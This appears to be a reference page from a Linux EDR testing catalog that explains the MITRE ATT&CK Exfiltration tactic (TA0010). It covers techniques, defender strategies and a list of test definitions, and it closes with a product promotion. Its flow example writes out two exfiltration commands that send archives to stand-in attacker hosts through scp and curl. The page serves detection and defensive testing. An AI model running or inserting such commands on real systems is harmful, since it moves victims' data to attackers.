Exfiltration - TA0010

Exfiltration - TA0010

Objective:

  • Steal collected data from the target environment. Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

  • ID: TA0010

Linux Context:

Exfiltration leverages SSH (scp, sftp), FTP, or cloud uploads (e.g., aws s3 cp). Data is often compressed gzip, taror encrypted openssl enc to evade detection. Covert channels like ICMP tunneling or DNS exfiltration bypass firewalls, while attackers throttle transfers to avoid bandwidth alerts. In cloud environments, misconfigured S3 buckets or SFTP servers become drop points.

Key Techniques:

  • Exfiltration Over C2 Channel (T1041): Sending data via existing C2.

  • Exfiltration Over Alternative Protocol (T1048): Using SCP or FTP.

  • Data Transfer Size Limits (T1030): Chunking data to avoid detection.

Flow Example:

  • Running scp -i key data.tar.gz attacker@remote:/tmp or curl -F "file=@secrets.zip" http://drop.site.

Defender Strategies:

  • Monitor egress with NIDS/FPC, enforce DLP policies, and restrict cloud API access. Audit SSH logs for large transfers.

The current list of corresponding EDRmetry test definitions includes:

  • EDR-T6307 - DNS Exfiltration with dig

  • EDR-T6115 - DNS Tunneling/Exfiltration with dnscat2

  • EDR-T6169 - eBPF Magic String Tracepoint Execution with bpftrace

  • EDR-T6136 - Exfil data using rsync

  • EDR-T6137 - Exfil data using transfer.sh

  • EDR-T6342 - Exfil data with AWS S3

  • EDR-T6211 - ICMP Python Scapy Exfiltration

  • EDR-T6168 - ICMP_exfil + nping Exfiltration

  • EDR-T6112 - NTP Data Exfiltration

  • EDR-T6103 - PAM creds over HTTP Post

  • EDR-T6234 - pam_exec SSHD Exfiltration

  • EDR-T6120 - Python FTP Upload

  • EDR-T6180 - SMB Data Exfiltration with impacket

  • EDR-T6257 - Telegram Data Exfiltration

  • EDR-T6052 - Upload data over HTTP/HTTPS

  • EDR-T6021 - Upload data over SCP/SFTP

  • EDR-T6135 - Upload data over WebDAV

  • EDR-T6181 - Upload/download data over SSHFS

EDRmetry Linux Matrix For Download / Self-Hosted - Comprehensive Hands-On Attack TTPs Catalog

Buy nowLearn more

1. EDRmetry Overview

2. EDRmetry Deployment

3. Research and emulation of Linux threats